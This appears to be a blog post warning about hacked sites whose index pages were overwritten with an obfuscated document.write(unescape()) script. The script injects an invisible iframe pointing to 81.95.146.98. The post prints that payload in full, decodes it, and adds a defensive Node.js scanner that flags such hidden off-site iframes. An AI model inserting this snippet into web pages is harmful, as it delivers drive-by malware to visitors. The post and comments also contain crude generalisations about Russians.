
A malicious IP address to watch for: [81.95.146.98]

If you get an alert that your browser is trying to download something (anything!) from [81.95.146.98], don’t do it. Why, you ask?

Because it’s probably a Trojan Horse, that’s why!

Here’s the deal – y’all probably know that I help run The Mystery of the Haunted Vampire, right? Well, some of the latest comment spam we’ve been getting has followed a very particular pattern: links to .edu and .org sites (legitimate sites) with link-spam pages dropped into support directories like “files”, “data”, “html” or “images” – whatever. That isn’t too important. The kicker is that these f*ckers are also downloading the site’s main index page and modifying it. Badly set site permissions then let these spambags upload the modified main page (which looks exactly like the original) back over the real one.

The problem is that this new page is itself a Trojan Horse – it now contains a snippet of JavaScript that pulls content in from another site. Buried within the HTML of the hacked page is something that looks like this:

<script language="javascript"> document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); </script>

That blah%blah%blah is URL (percent) encoding: each %XX is the hex value of one character, and unescape() tells the JavaScript to turn the gobbledy-gook back into readable text. Decoded, it is an iframe tag whose src is http://81.95.146.98/index.html, with frameborder="0", width="1", height="1" and scrolling="no", which document.write() then injects into the page. This IP address is owned by a Russian ISP incorporated in Panama.
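If you want to do the decoding the way I did it by hand, but for a whole page at a time, here is a small Node.js script added to this post as an example (it is not code from the original post, and not from the spammers). It finds every document.write(unescape('...')) payload in a saved copy of a page, decodes the percent-encoding the way the browser's legacy unescape() does, and flags any iframe that is 1 x 1 or otherwise hidden and points off-site. SAMPLE_HTML is a constructed stand-in for a hacked index page carrying the encoded string quoted above; BENIGN_HTML and the host name example.edu are placeholders for this demo.

```javascript
// Added example (not part of the original post): decode document.write(unescape(...))
// payloads found in a saved copy of a suspect page and flag hidden, off-site iframes.
// SAMPLE_HTML is a constructed stand-in for a hacked index page; the percent-encoded
// string inside it is the one quoted in the post. 'example.edu' is a placeholder host.

const SAMPLE_HTML = `<html><body>
<h1>Department of Something</h1>
<script language="javascript"> document.write( unescape( '` +
  '%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34%36%2E' +
  '%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20' +
  '%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67' +
  '%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E' +
  `' ) ); </script>
</body></html>`;

// Constructed benign page that also uses unescape(), to show the scanner stays quiet on it.
const BENIGN_HTML = `<html><body><script>document.write(unescape('%3C%62%3E%68%69%3C%2F%62%3E'));</script></body></html>`;

// Legacy JavaScript unescape(): %uXXXX -> one UTF-16 code unit, %XX -> one code unit
// (no UTF-8 decoding, unlike decodeURIComponent); anything else is left untouched.
function legacyUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (m, u4, h2) =>
    String.fromCharCode(parseInt(u4 !== undefined ? u4 : h2, 16)));
}

// Return the decoded string literal of every unescape('...') / unescape("...") call.
function extractUnescapePayloads(html) {
  const re = /unescape\s*\(\s*(['"])([^'"]*)\1\s*\)/g;
  const payloads = [];
  let m;
  while ((m = re.exec(html)) !== null) payloads.push(legacyUnescape(m[2]));
  return payloads;
}

// Pull every <iframe> out of a decoded fragment with its attributes (quoted or bare,
// whitespace around '=' allowed, as in the spammers' "src= http://..."), and mark
// the ones a user could not see: 1x1 or smaller, or hidden via inline style.
function findIframes(fragment) {
  const tagRe = /<iframe\b([^>]*)>/gi;
  const results = [];
  let t;
  while ((t = tagRe.exec(fragment)) !== null) {
    const attrRe = /([a-zA-Z_:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
    const attrs = {};
    let a;
    while ((a = attrRe.exec(t[1])) !== null) attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4];
    const w = parseInt(attrs.width, 10);
    const h = parseInt(attrs.height, 10);
    const hidden = (!Number.isNaN(w) && w <= 1) || (!Number.isNaN(h) && h <= 1) ||
      /display\s*:\s*none|visibility\s*:\s*hidden/i.test(attrs.style || '');
    results.push({ src: attrs.src || '', width: attrs.width, height: attrs.height, hidden });
  }
  return results;
}

// Scan a page: decode each payload, extract iframes, and resolve each src against the
// site's own host so relative and same-host frames are not reported as off-site.
function scanPage(html, siteHost) {
  const findings = [];
  for (const payload of extractUnescapePayloads(html)) {
    for (const f of findIframes(payload)) {
      let host = '';
      try { host = new URL(f.src, `http://${siteHost}/`).hostname; } catch (_) { /* unparsable src */ }
      findings.push({ ...f, host, offSite: host !== '' && host !== siteHost });
    }
  }
  return findings;
}

for (const f of scanPage(SAMPLE_HTML, 'example.edu')) {
  console.log(`${f.hidden ? 'HIDDEN ' : ''}iframe -> ${f.src} (${f.offSite ? 'OFF-SITE: ' + f.host : 'same site'})`);
}
```

Run it with node against a page you fetched with curl or wget (not in a browser) and any hit that says HIDDEN and OFF-SITE is exactly the pattern described above; the host it prints is the one to look up and report.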

A Russian-owned ISP incorporated in Panama. Repeat that a couple of times, m’kay?

No, that doesn’t sound suspicious at all, does it?

They’ve changed their tactics a little over the past couple of days. When I first saw this script, they were trying to write borderless, scroll-less 1 x 1 frames (i.e., invisible) from the site – now, they’re masquerading as various proprietary (but safe-sounding) file formats. Whatever happens, don’t click OK!

How did I find this out? Well, yesterday, after going through my standard anti-spam paces of notifying one of the victims that they’d been hacked, I notified the Russian/Panamanian ISP that they had a rogue customer, since this was the 3rd or 4th time I’d seen that same IP address embedded in the JavaScript. This evening, I was browsing a random site while looking for possible vacation rentals and got the “Do you want to download this file” message – from the same IP address!

D’oh! It isn’t the IP address that’s rogue – it might be the whole bloody company!

So there you have it, kids. Don’t download anything from Russians working in Panama (God, that sounds like a Warren Zevon song, doesn’t it? Or something out of Gibson. Or Burgess, even). And if anyone from the network in question (rbnnetwork.com) tries to sell you their services, ask ’em about the spammers that they harbor, ‘kay?

And lastly, if you did click “OK” recently? I hope you’ve a.) got good anti-virus software and b.) got a backup of your critical files. You’re probably going to need both…

[Updated to add: Oh yeah – if you’re using Internet Explorer, you’re *so* going to need anti-virus software. These f*ckers have been around for a while. Note to self: Russian ISPs in Panama are not to be notified that they have rogue customers – they are the rogue customers.]

4 Responses to “A malicious IP address to watch for: [81.95.146.98]”

  1. Carnacki Says:

    This is enough to make me despise Panamanian Russians.

    I bet they’re former KGB too.

  2. protected static Says:

    There’s a line in William S Burroughs that keeps coming to mind – “like you find in a Chinese restaurant in Panama…”

    It has that same level of… unexpectedness to it.
